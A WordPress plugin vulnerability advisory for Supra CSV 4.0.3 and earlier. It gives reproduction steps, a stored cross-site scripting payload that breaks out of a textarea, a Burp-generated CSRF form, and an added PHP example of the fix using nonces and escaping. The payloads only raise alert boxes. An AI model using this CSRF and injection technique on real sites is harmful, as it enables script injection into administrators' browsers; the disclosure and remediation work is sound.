WordPress Plugin Vulnerabilities

Supra CSV <= 4.0.3 - Stored Cross-Site Scripting via CSRF

Description

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the victim's web browser by including malicious code in a legitimate web page or web application.
I have found a stored XSS in the Supra CSV plugin, version 4.0.3. The official page of the plugin is given below:
https://wordpress.org/plugins/supra-csv-parser

Proof of Concept

Steps to reproduce:
Step 1: Download and install the plugin.
Step 2: Activate it and go to the plugin's settings page.
Step 3: Fill in the details and intercept the request using Burp Suite.
Step 4: The parameter "scsv_defaultdesc=" is vulnerable to XSS with the payload below:
xss</textarea></p><script>alert(1)</script>//
Step 5: From this script we can see that the plugin is vulnerable to stored XSS.
Step 6: Generate a CSRF payload for the request and send it to the victim.
Step 7: The CSRF payload is given below:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=supra_csv_admin" method="POST">
      <input type="hidden" name="scsv_wpname" value="xss1<>&quot;&apos;/" />
      <input type="hidden" name="scsv_wppass" value="xss2<>&quot;&apos;/" />
      <input type="hidden" name="scsv_autopub" value="0" />
      <input type="hidden" name="scsv_posttype" value="post" />
      <input type="hidden" name="scsv_defaulttitle" value="xss3<>&quot;&apos;/" />
      <input type="hidden" name="scsv_defaultdesc" value="xss4</textarea></p><script>alert(2)</script>//" />
      <input type="hidden" name="scsv_custom_terms" value="xss5<>&quot;&apos;/" />
      <input type="hidden" name="scsv_csv_settings[delimiter]" value=",xss6<>&quot;&apos;/" />
      <input type="hidden" name="scsv_csv_settings[enclosure]" value="&quot;xss7<>&quot;&apos;/" />
      <input type="hidden" name="scsv_csv_settings[escape]" value="\" />
      <input type="hidden" name="scsv_line_maxlen" value="1000" />
      <input type="hidden" name="scsv_submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step 8: The stored XSS is executed successfully via the CSRF vulnerability.
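The steps above depend on two defects in the settings page: the form accepts a cross-site POST without a nonce, and the submitted value is stored and later written back into a textarea unescaped, so a string containing </textarea> breaks out of the element. The handler below closes both. It is an added example written for this page, not the Supra CSV plugin's own code; the hook, function and slug names prefixed example_ are assumptions, while the scsv_* field names are those in the PoC request above.

```php
<?php
// Added example, not the Supra CSV plugin's own code. Names prefixed
// "example_" are assumptions; the scsv_* field names come from the advisory.

// Register the settings page so that only users holding manage_options can
// open it; the same capability is re-checked when the form is saved.
add_action( 'admin_menu', function () {
    add_menu_page(
        'CSV Import Settings',    // page title
        'CSV Import',             // menu title
        'manage_options',         // capability required to see the page
        'example_csv_admin',      // menu slug (assumption)
        'example_csv_render_page' // render callback defined below
    );
} );

// Process the settings form. Runs on admin_init, before the page renders.
function example_csv_handle_post() {
    if ( ! isset( $_POST['scsv_submit'] ) ) {
        return; // not a submission of this form
    }

    // Authorization: an authenticated but low-privileged user must not be
    // able to change plugin options even if they reach this handler.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // CSRF defence: the request must carry a nonce bound to this action and
    // to the logged-in user. A form served from another origin, like the PoC,
    // cannot obtain one, so check_admin_referer() dies here and nothing is stored.
    check_admin_referer( 'example_csv_save', 'example_csv_nonce' );

    // Input sanitisation: strip tags and stray control characters before the
    // values reach the database. wp_unslash() removes the slashes WordPress adds.
    $desc  = isset( $_POST['scsv_defaultdesc'] )
        ? sanitize_textarea_field( wp_unslash( $_POST['scsv_defaultdesc'] ) ) : '';
    $title = isset( $_POST['scsv_defaulttitle'] )
        ? sanitize_text_field( wp_unslash( $_POST['scsv_defaulttitle'] ) ) : '';

    // Constrained fields: coerce to the expected type or whitelist instead of
    // trusting the raw string.
    $autopub = ( isset( $_POST['scsv_autopub'] ) && '1' === $_POST['scsv_autopub'] ) ? 1 : 0;
    $maxlen  = isset( $_POST['scsv_line_maxlen'] ) ? absint( $_POST['scsv_line_maxlen'] ) : 1000;
    $type    = isset( $_POST['scsv_posttype'] ) ? sanitize_key( $_POST['scsv_posttype'] ) : 'post';
    if ( ! post_type_exists( $type ) ) {
        $type = 'post';
    }

    update_option( 'scsv_defaultdesc',  $desc );
    update_option( 'scsv_defaulttitle', $title );
    update_option( 'scsv_autopub',      $autopub );
    update_option( 'scsv_line_maxlen',  $maxlen );
    update_option( 'scsv_posttype',     $type );
}
add_action( 'admin_init', 'example_csv_handle_post' );

// Render the form. Every stored value is escaped for the context it lands in:
// esc_textarea() for the textarea body and esc_attr() for attribute values, so
// a stored string such as xss</textarea></p><script>... is emitted as inert text.
function example_csv_render_page() {
    $title = get_option( 'scsv_defaulttitle', '' );
    $desc  = get_option( 'scsv_defaultdesc', '' );
    ?>
    <div class="wrap">
        <h1>CSV Import Settings</h1>
        <form method="post" action="">
            <?php wp_nonce_field( 'example_csv_save', 'example_csv_nonce' ); ?>
            <p>
                <label for="scsv_defaulttitle">Default title</label><br>
                <input type="text" id="scsv_defaulttitle" name="scsv_defaulttitle"
                       value="<?php echo esc_attr( $title ); ?>">
            </p>
            <p>
                <label for="scsv_defaultdesc">Default description</label><br>
                <textarea id="scsv_defaultdesc" name="scsv_defaultdesc" rows="5" cols="60"><?php
                    echo esc_textarea( $desc );
                ?></textarea>
            </p>
            <p><input type="submit" name="scsv_submit" class="button button-primary" value="Update Options"></p>
        </form>
    </div>
    <?php
}
```

Sanitising on input and escaping on output are both kept: sanitisation limits what is persisted, escaping guarantees that whatever is persisted cannot change the structure of the page it is rendered into. A plugin built on the WordPress Settings API (register_setting() with a sanitize_callback, posting to options.php) gets the nonce and capability checks from core, but the output escaping in the render callback is still the plugin author's responsibility.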

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Rahul selvakumar
Submitter
Rahul selvakumar
Verified
Yes

Timeline

Publicly Published
2022-12-05
Added
2022-11-21
Last Updated
2022-11-21

Other